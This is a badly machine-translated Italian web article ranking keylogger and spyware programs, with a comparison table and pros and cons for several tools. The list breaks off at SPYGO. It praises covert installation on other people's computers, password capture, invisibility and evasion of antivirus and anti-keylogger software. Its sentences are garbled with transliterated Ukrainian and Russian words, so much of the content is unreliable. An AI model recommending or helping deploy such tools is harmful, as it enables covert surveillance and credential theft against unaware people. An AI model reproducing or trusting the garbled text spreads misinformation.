Tali utilità sono di tipo diverso - per l'aiuto di alcuni puoi guardare l'intero testo digitato dalla tastiera, per l'aiuto di altri - solo quello che viene digitato nel browser o in qualsiasi programma selezionato.

I programmi Deyakі danno l'opportunità di creare tali display, altrimenti - no.

Quindi puzzano uno per uno dopo il livello di occultamento. Ad esempio, l'attività di alcuni è ovvia, sul tavolo di lavoro c'è troppo poco yarlik. programmi per controllare le attività, ad esempio i bambini.

Segui la presenza e l'attività degli altri, non ricordiamo: la puzza è attaccata e installata per l'installazione sul computer di qualcun altro, se è necessario allegare il fatto dell'installazione a un coristuvach di terze parti.

Vrakhovuchi una tale varietà, scegliere il software più adatto può essere fatto pieghevole.

In questo materiale di presentazione del TOP dei migliori programmi, è possibile vincere allo scopo. Tra questi, è più facile scegliere quello di cui ho bisogno.

Caratteristiche tecniche

Per semplificare il processo di scelta del software, nelle tabelle seguenti sono elencate le principali caratteristiche relative di tutti i programmi inclusi fino al TOP.

nomeTipo di licenzaTipo di informazioni da raccogliereFunzionaleDesign
SC-KeyLogNessun costoTuttiAmpioperdono
Keylogger a portata di mano WideStepGratuito/a pagamentoTuttiAmpioRifinitura
Spia realePagatoTuttiDuje largoStandard
Elite KeyloggerPagatoTuttiAmpioStandard
Il ratto!Gratuito/a pagamentoMeno, più in basso nella parte anterioreFinisci largoantiestetico
SPYGONessun costoVersione a maggeseVersione a maggeseDesign standard di Windows
Keylogger Ardamax 2.9Nessun costo3 tastiereSuoniperdono
Monitor personale Keylogger NS 3.8Nessun costoTuttiSuoniperdono
Spia del KGBPagatoTastiera Z + programmi apertiVuzkysemplice
Keylogger d'oro 1.32Nessun costo3 tastiereTroppo strettosemplice

In base alle caratteristiche di queste tabelle, è facile scegliere il programma più adatto per un determinato programma.

Il rapporto su questa utilità è riportato di seguito.

SC-KeyLog

Lo scopo è il volume del programma funzionale dello shpigun, poiché si espande senza costi.

Krim vіdstezhennya senza informazioni intermedie, scho da inserire dalla tastiera, puoi anche scegliere, gli indirizzi dei siti che vedi, le password e le finestre che inserisci nel browser.

Fornire nuove informazioni su tutte le attività visualizzate sul computer. Con l'aiuto dello stampaggio, il file può essere visualizzato da una posizione diversa.

  • Possibilità di accesso remoto ad un file da un altro allegato;
  • Vіdsutnіst solo programmi sul computer per l'impostazione corretta;
  • La diversità dei dati scelta: possono essere disponibili informazioni pratiche su tutte le attività su un PC.
  • Salva password solo superiori a NT0;
  • Menu troppo semplice e design antiestetico;
  • Completa il formato non manuale per il risultato.

E come sembra coristuvachi, yakі attivamente software vikoristuyut tsey? "Assolutamente incomprensibile per un koristuvach", "Daniel ha ragione a venire all'ufficio postale".

Keylogger a portata di mano WideStep

Il programma Tsya si espande mentalmente senza costi. Il prezzo della nuova versione a pagamento è di 35 dollari.

Dosit tsіkava quel programma funzionale, come costare i tuoi penny, se sei pronto a pagarli.

Vidmіnna riso– edificio per correggere i dati registrati con la periodicità designata. In altri casi è normale, spesso, stabile per altri programmi di questo elenco.

  • Selezione di informazioni di vario tipo;
  • Povna invisibilità dei robot dal computer del coristuvach;
  • Interfaccia semplice e keruvannya.
  • Il design è più corto, più basso nella parte anteriore del programma, ma tutto non è al top;
  • Il formato di visualizzazione del risultato non è manuale;
  • La versione a pagamento costa molto.

Dai un'occhiata al software selezionato in questo modo: “Programma intelligente, semplice e funzionale. Dosit non ricordo l'ora di lavoro.

Spia reale

Il programma a pagamento funzionale e pieghevole è di 600 rubli. Tuttavia, potrebbe esserci una versione demo, che può essere utilizzata gratuitamente.

Caratteristiche di quale software- Salute nell'ora del periodo di attività.

Questo aiuta a risolvere il problema dell'inserimento di una password/chiave grafica, poiché il resto dell'ora ha iniziato a diffondersi ampiamente.

  • Tipi di informazioni anonime raccolte, oltre alla possibilità di acquisire schermate dallo schermo durante il periodo dell'appuntamento;
  • C'è un gran numero di altre funzioni e caratteristiche aggiuntive;
  • Annota yak dії, e l'ora vikonannya;
  • Crittografa il registro di formazione.
  • Trivalità del lavoro (selezione delle informazioni) affinché la versione demo gratuita diventi 40 penne;
  • Paga più ampio, se vuoi un prezzo più grande-meno è accettabile;
  • Per finire il programma è fantastico.

I commenti dei corrispondenti su questo programma sono i seguenti: “Il programma è riconosciuto. Bravi programmatori!

Elite Keylogger

Programma a pagamento con un prezzo elevato- 69 dollari. Dіє sul PC sarà insondabile nella modalità di basso livello, quindi potrebbe non apparire.

Tsіkava quella singolarità zruchna- Avvio automatico del software, che parte subito dopo l'avvio del sistema stesso.

Funziona bene o non viene visualizzato con speciali anti-keylogger.

  • Povnistyu prihovana diya that skladnіstі v vyyavlennі;
  • Il formato del robot è il tipo di driver di basso livello e avvio automatico all'ora di occupazione del sistema;
  • Vіdstezhuє і takozh i natiskannya non solo il principale, ma i pulsanti di servizio sulla tastiera.
  • Sistema di installazione software pieghevole Dosit su PC;
  • Il programma è di alta qualità, ma su Internet russo puoi trovare la vecchia versione malvagia;
  • Dosit sistema pieghevole di programmi іndivіdualnykh nashtuvan, yak, vtіm, te stesso virtuoso.

Come ti sembra coristuvachi di questo software? "Buon programma", "Trochs non raggiunge Jetlogger".

Il ratto!

Dosit esteso e popolare, utilità funzionale con una licenza a pagamento.

Tuttavia, si spera in una versione demo gratuita con un periodo di tempo limitato per una voce privata.

Il programma è molto semplice- scrivilo tu stesso, forse una specie di koristuvach appiccicoso. Tim non è da meno, è quasi impossibile per antivirus e programmi speciali che rilevano tale software.

  • Semplicità, funzionalità ed elevata stabilità di lavoro;
  • La quantità minima di spazio per il file, poiché prende in prestito sul computer;
  • Per finire il bagato nalashtuvan.
  • Finisci un design inaccettabile, strizza l'occhio nei colori nero, bianco e rosso;
  • Deshcho funzionale in precedenza, inferiore nei programmi descritti in precedenza;
  • Una recensione di non gestione della rivista e uno sguardo a un'interfaccia di non gestione e una vittoria.

Koristuvachi dice di questo programma in questo modo: "La pratica è stabile, la birra è semplice", "Il programma è buono, ti permette di raccogliere dati senza memoria".

SPYGO

Il prezzo di un nuovo keylogger, incarichi di lavoro e sdoppiamento da parte di un programmatore russo.

© 2022 androidas.ru - Tutto su Android